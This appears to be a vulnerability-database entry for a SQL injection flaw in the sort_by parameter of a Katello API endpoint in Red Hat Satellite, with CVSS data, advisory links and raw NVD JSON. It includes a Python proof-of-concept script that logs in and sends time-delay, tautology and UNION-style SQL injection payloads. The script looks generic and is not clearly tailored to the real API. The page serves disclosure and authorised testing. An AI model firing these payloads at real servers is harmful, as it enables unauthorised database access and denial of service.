CVE-2026-4324

Description

A flaw was found in the Katello plugin for Red Hat Satellite. This vulnerability, caused by improper sanitization of user-provided input, allows a remote attacker to inject arbitrary SQL commands into the sort_by parameter of the /api/hosts/bootc_images API endpoint. This can lead to a Denial of Service (DoS) by triggering database errors, and potentially enable Boolean-based Blind SQL injection, which could allow an attacker to extract sensitive information from the database.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Katello plugin for Red Hat Satellite (版本未明确列出，请参考Red Hat官方安全公告)

Red Hat Satellite 6.x (受影响的特定版本需参考RHSA-2026:5968和RHSA-2026:5970)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-4324 PoC - SQL Injection in Katello sort_by parameter
# Target: Red Hat Satellite with Katello plugin

def exploit_cve_2026_4324(target_url, username, password):
    """
    Exploit SQL Injection in /api/hosts/bootc_images endpoint
    via sort_by parameter
    """
    # Login to get session
    login_url = f"{target_url}/api/users/login"
    session = requests.Session()
    
    # Login payload
    login_data = {
        'username': username,
        'password': password
    }
    
    try:
        login_resp = session.post(login_url, json=login_data, verify=False, timeout=10)
        if login_resp.status_code != 200:
            print(f"[-] Login failed: {login_resp.status_code}")
            return False
        print("[+] Login successful")
        
        # SQL Injection test payloads
        payloads = [
            "1; SELECT pg_sleep(5)--",
            "1' OR '1'='1",
            "1' UNION SELECT NULL--",
            "1; SELECT current_database()--"
        ]
        
        api_endpoint = f"{target_url}/api/hosts/bootc_images"
        
        for payload in payloads:
            print(f"[*] Testing payload: {payload}")
            params = {'sort_by': payload}
            
            try:
                resp = session.get(api_endpoint, params=params, verify=False, timeout=15)
                # Check for SQL error indicators
                if 'error' in resp.text.lower() or resp.elapsed.total_seconds() > 5:
                    print(f"[+] Potential vulnerability detected with payload: {payload}")
                    print(f"[+] Response time: {resp.elapsed.total_seconds()}s")
                    return True
            except requests.exceptions.RequestException as e:
                print(f"[-] Request error: {e}")
        
        return False
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} https://satellite.example.com admin password")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    exploit_cve_2026_4324(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4324
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4324
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4324/
[4] VulDB https://vuldb.com/cve/CVE-2026-4324
[5] https://access.redhat.com/errata/RHSA-2026:5968
[6] https://access.redhat.com/errata/RHSA-2026:5970
[7] https://access.redhat.com/security/cve/CVE-2026-4324
[8] https://bugzilla.redhat.com/show_bug.cgi?id=2448349

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4324", "sourceIdentifier": "[email protected]", "published": "2026-03-17T14:16:19.777", "lastModified": "2026-03-27T00:16:23.800", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in the Katello plugin for Red Hat Satellite. This vulnerability, caused by improper sanitization of user-provided input, allows a remote attacker to inject arbitrary SQL commands into the sort_by parameter of the /api/hosts/bootc_images API endpoint. This can lead to a Denial of Service (DoS) by triggering database errors, and potentially enable Boolean-based Blind SQL injection, which could allow an attacker to extract sensitive information from the database."}, {"lang": "es", "value": "Se encontró un defecto en el plugin Katello para Red Hat Satellite. Esta vulnerabilidad, causada por un saneamiento inadecuado de la entrada proporcionada por el usuario, permite a un atacante remoto inyectar comandos SQL arbitrarios en el parámetro sort_by del endpoint de la API /api/hosts/bootc_images. Esto puede conducir a una Denegación de Servicio (DoS) al desencadenar errores en la base de datos, y potencialmente habilitar la inyección SQL ciega basada en booleanos, lo que podría permitir a un atacante extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:5968", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:5970", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-4324", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448349", "source": "[email protected]"}]}}